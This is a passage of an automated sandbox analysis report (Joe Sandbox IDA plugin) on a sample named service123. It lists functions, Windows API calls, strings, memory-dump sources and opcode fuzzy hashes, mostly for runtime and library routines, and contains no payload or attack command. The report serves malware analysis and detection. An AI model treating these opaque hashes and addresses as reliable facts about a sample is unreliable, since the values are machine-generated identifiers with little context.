Opcode Fuzzy Hash: 37b38657217a706d39ccc4c2089e54b479c61993ae6bc1e8c30bc91a4a1aa2ba
Instruction Fuzzy Hash: 06F0E2B0D693554FD3009F2884827667BA0BF43315F4C1C84E8845BB43C33998D9CBA1

Function 6CA2DE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6CA2DEB8

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: 42f913d4adf8f89ed2e02518ed2643e25613b5b6dc0c3397f97f6556aec1f51f
Instruction ID: 3d3c60d74d33e1cd2f9878850f3e6fb6a9d47f673bf36ff5425f7ea574545124
Opcode Fuzzy Hash: 42f913d4adf8f89ed2e02518ed2643e25613b5b6dc0c3397f97f6556aec1f51f
Instruction Fuzzy Hash: C121C670D0166D8ADB20DF50CD80BD977B8AF46308F1845A6D918AB701EB38DEC9CF80

Function 6CA2DA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 243d5b048c0adae9ce0748a7828eb482aab58a8d62f84873c25e909defff4ded
Instruction ID: dbc4f1f410287dd905c21ded0ae7a8fcfb4cf3432024c39244f214c0b6b2f053
Opcode Fuzzy Hash: 243d5b048c0adae9ce0748a7828eb482aab58a8d62f84873c25e909defff4ded
Instruction Fuzzy Hash: 39413D74E0422D9BCB10DF65C990BDDB7B1AF89318F1889A9D849A7701D734AEC9CF90

Function 6CA2DCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: 3d035b7ae8f494885bb64b5f82a46f4d5f26522bb37aed9b72689f255988d3f4
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: 19111C74D0122C9BCB14DF65CA909DEB7B5AF85358F189964E80D67B01DB30AE8DCBD0

Function 6CA2DD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction ID: 5aee75cf8d7339655636f51c5e059d461e6f373df3f8cc298dece5df8d0cf9ed
Opcode Fuzzy Hash: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction Fuzzy Hash: 4E211D74E0022D9BCF14DF61C9809DDB7B5EF45308F148998D90967741DB30AE8ECB90

Function 6CA30310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CAF395F), ref: 6CA3034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CAF395F), ref: 6CA30352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CAF395F), ref: 6CA30360

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 5d8430e88ff01c981fc7861037a7a03e9aba0a8951decfd1225d3d83681226c8
Instruction ID: 946c6b17191d87f2f3a6e542074d8519a611a1c117828196a242f23097c8bd66
Opcode Fuzzy Hash: 5d8430e88ff01c981fc7861037a7a03e9aba0a8951decfd1225d3d83681226c8
Instruction Fuzzy Hash: 23518D70A093518FCB04EF29C59460A77F5FB86308F19962DD859CB714EB30E889CB92

Function 007B1940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 007B196F
vfprintf.MSVCRT ref: 007B198F
abort.MSVCRT ref: 007B1994
VirtualQuery.KERNEL32 ref: 007B1A2B

Strings

VirtualProtect failed with code 0x%x, xrefs: 007B1AA6
VirtualQuery failed for %d bytes at address %p, xrefs: 007B1AD7
Mingw-w64 runtime failure:, xrefs: 007B1968
Address %p has no image-section, xrefs: 007B1AEB

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 433437f3898cf48261361dbdd6667796182a8fe5835161c3c81ffcad270d0667
Instruction ID: c4d729be98e55728c4b471c6f5d4ab2f3f0082de9e0330c62b93d87b98fd526b
Opcode Fuzzy Hash: 433437f3898cf48261361dbdd6667796182a8fe5835161c3c81ffcad270d0667
Instruction Fuzzy Hash: E15158B1508304DFC710EF28D895B9AFBE4FF84354F95CA2DE4899B211E738A845CB96

Function 6CA2A690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6CA2A6BF
vfprintf.MSVCRT ref: 6CA2A6DF
abort.MSVCRT ref: 6CA2A6E4
VirtualQuery.KERNEL32 ref: 6CA2A77B

Strings

Mingw-w64 runtime failure:, xrefs: 6CA2A6B8
Address %p has no image-section, xrefs: 6CA2A83B
VirtualProtect failed with code 0x%x, xrefs: 6CA2A7F6
VirtualQuery failed for %d bytes at address %p, xrefs: 6CA2A827

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: ce7e1b5197ce171b82c0d5605d6541b9c72a290d928126462379524943883ea1
Instruction ID: 44737bae7b1c657104d1ebda8ec5bae42f94b2143415478bcc791f33fa760d28
Opcode Fuzzy Hash: ce7e1b5197ce171b82c0d5605d6541b9c72a290d928126462379524943883ea1
Instruction Fuzzy Hash: 74517CB19097219FC700EF29C58465ABBF5FF84318F59CA1CD88897754D738E889CB92

Function 6CA2E0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: a08cc1345001a12e71b4e63d1de784234a215ef4e1395c3c28f26640ccb1b06b
Instruction ID: 5c8c837f4945b49924d6e3527d19b4452b721ddf7db4b66207da91182f12bcfc
Opcode Fuzzy Hash: a08cc1345001a12e71b4e63d1de784234a215ef4e1395c3c28f26640ccb1b06b
Instruction Fuzzy Hash: E5212E323492248FC704CF68D881596B3A6FBC632972C817ED5488BB55D63BE887C790

Function 6CA2E570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: 7e15b4bf978816558a0e0e9dfe11e346e645fd3730225bdba4593f943739dda9
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: 9F41D8705087268BD710DF39C040BA6B7E1AF85315F5C4A19E8A487B95E73CD9CE8BD2

Function 6CA2E59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: f1b2aae09f2e58d651d2857067ab96a59b7cb3c5ea6271532d66ddaf19111ce2
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: 2821C9705053264BD710DE38C1506AAB7E1AF45319F6C4E09E4E497A45E338D9CA87D2

Function 6CA2E714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: cd11f6f1553f52037667084c2586cf2d8fad8a138f995d7409aef46d4b247ca0
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 58E04F705886398AC710CA38C1619D5B7969E4A349B4C4906D4D587E14D738D9CB8AC2

Function 6CA39249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6CA39260
GetProcAddress.KERNEL32 ref: 6CA3927A
LoadLibraryW.KERNEL32 ref: 6CA3929F
GetProcAddress.KERNEL32 ref: 6CA392B3

Strings

advapi32.dll, xrefs: 6CA39298
msvcrt.dll, xrefs: 6CA39255
SystemFunction036, xrefs: 6CA392A8
rand_s, xrefs: 6CA3926F

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: b991dddd4f9b0f4f186f2683143cc297b2198620588c3f53bef91d844fdb49cb
Instruction ID: df750903027d9c90294b16f10558494696873a94973021a2a5ed927a99d79078
Opcode Fuzzy Hash: b991dddd4f9b0f4f186f2683143cc297b2198620588c3f53bef91d844fdb49cb
Instruction Fuzzy Hash: 16F04FB1948B508FCB00BFB8964A21EBFB4BB05324F01493CD4C997204D7309454CFA7

Function 6CABF8C0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA9DA2E), ref: 6CABF95D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA9DA2E), ref: 6CABF988
memmove.MSVCRT ref: 6CABF9D7
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA9DA2E), ref: 6CABFA0D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA9DA2E), ref: 6CABFA58

Strings

basic_string::_M_replace, xrefs: 6CABFBB6

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 68df7b917a798b5d46d69213231e2c8e2e794de6251d7ebde7a05ea96bd74c27
Instruction ID: dcc73cc9e51d52215735d2dca2715f88229842103014f76a204ce7a99032623a
Opcode Fuzzy Hash: 68df7b917a798b5d46d69213231e2c8e2e794de6251d7ebde7a05ea96bd74c27
Instruction Fuzzy Hash: 7E815778A093519FC301DF2CC99051EFBE5AFCA644F28891EE4D5A7715D732D888CBA2

Function 6CA2FEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6CA300D2
WaitForSingleObject.KERNEL32 ref: 6CA30117

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: bd3f807d832d9e20bd78bc0e59597b74b884f41ffbde473012cda418d774e9f0
Instruction ID: 2ad85a36409c759333ee9eb14301c2ac5fdc7f4229c3d287db3eec09c530a442
Opcode Fuzzy Hash: bd3f807d832d9e20bd78bc0e59597b74b884f41ffbde473012cda418d774e9f0
Instruction Fuzzy Hash: E061BD30B0A365CFCB20EF69D95031677F9BB46309F08852DE81997B44D778D88ACB92

Function 6CA2E760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: d231f7a8be1acfc2aa0d656f1b08b9753fe0dc7696f6e2da2898322decd4ffba
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
